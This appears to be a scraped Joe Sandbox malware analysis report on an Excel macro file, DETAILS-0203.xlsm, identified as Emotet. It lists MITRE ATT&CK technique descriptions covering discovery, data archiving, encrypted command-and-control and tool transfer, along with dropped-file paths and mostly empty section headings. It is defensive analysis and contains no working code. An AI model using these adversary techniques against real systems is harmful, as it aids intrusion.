Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DETAILS-0203.xlsm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\uVyr9TJj[1].dll

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E829263A.png

C:\Users\user\Desktop\~$DETAILS-0203.xlsm

C:\Users\user\sei.ocx

C:\Windows\SysWOW64\Uxnbokktp\diqvt.pvx (copy)

Static File Info

General

File Icon

Static OLE Info

General

OLE File "DETAILS-0203.xlsm"

Indicators

Windows Analysis Report
DETAILS-0203.xlsm

Function 10007DD4 Relevance: 44.1, APIs: 8, Strings: 17, Instructions: 375
memoryCOMMON

Function 10020650 Relevance: 16.6, APIs: 11, Instructions: 103
memoryCOMMON

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre